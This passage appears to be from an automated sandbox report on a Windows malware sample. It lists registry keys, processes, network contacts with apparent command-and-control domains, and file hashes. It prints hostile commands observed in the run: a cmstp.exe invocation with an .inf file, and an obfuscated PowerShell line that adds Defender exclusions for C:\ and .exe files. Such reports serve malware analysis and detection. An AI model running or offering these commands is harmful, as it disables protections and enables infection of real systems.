| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"
\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')
C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
| RU | 185.170.144.39:80 | poolfreshstep.com | tcp |
| US | 8.8.8.8:53 | 39.144.170.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fallback-01-static.com | udp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.145.90.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
Files
memory/4760-0-0x00007FFF3D863000-0x00007FFF3D865000-memory.dmp
memory/4760-1-0x0000000000C60000-0x0000000000C6C000-memory.dmp
memory/4760-2-0x000000001B7C0000-0x000000001B836000-memory.dmp
memory/4760-3-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp
memory/4760-4-0x00007FFF3D863000-0x00007FFF3D865000-memory.dmp
memory/4760-5-0x0000000002FC0000-0x0000000002FDE000-memory.dmp
memory/4760-6-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp
memory/4760-7-0x000000001BA90000-0x000000001BB70000-memory.dmp
memory/4760-10-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp
C:\Users\Admin\A.inf
| MD5 | 961df7710c27cd2a2452c11aa48ada24 |
| SHA1 | 081694e0067918b8355efef2cf72ef52d82e44b0 |
| SHA256 | d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41 |
| SHA512 | 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uajcztiv.2ns.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4760-20-0x000000001B950000-0x000000001B972000-memory.dmp
memory/4760-21-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp
memory/4760-35-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
| MD5 | d00a8f6a66f5fcaf18564b6f47831294 |
| SHA1 | d1ae07fd6267b53264f1764cc45aafbfe9f5f763 |
| SHA256 | a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039 |
| SHA512 | 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27 |
memory/4760-48-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp
memory/656-49-0x0000000000B60000-0x0000000000BD0000-memory.dmp
memory/656-50-0x0000000005480000-0x000000000551C000-memory.dmp
memory/656-72-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-78-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-114-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-112-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-110-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-106-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-104-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-102-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-96-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-94-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-92-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-90-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-88-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-84-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-82-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-80-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-76-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-74-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-70-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-68-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-66-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-64-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-60-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-58-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-108-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-100-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-98-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-86-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-63-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-56-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-54-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-52-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-51-0x0000000005480000-0x0000000005516000-memory.dmp
memory/656-2905-0x0000000005630000-0x000000000565C000-memory.dmp
memory/656-2906-0x0000000005660000-0x00000000056AC000-memory.dmp
memory/656-2907-0x0000000005A30000-0x0000000005B20000-memory.dmp
memory/656-7876-0x0000000005B90000-0x0000000005BF6000-memory.dmp
memory/656-7877-0x00000000065B0000-0x0000000006B54000-memory.dmp
memory/656-7878-0x00000000060E0000-0x0000000006172000-memory.dmp
memory/656-7879-0x0000000006CE0000-0x0000000006CF2000-memory.dmp
memory/656-7880-0x0000000006DF0000-0x0000000006E40000-memory.dmp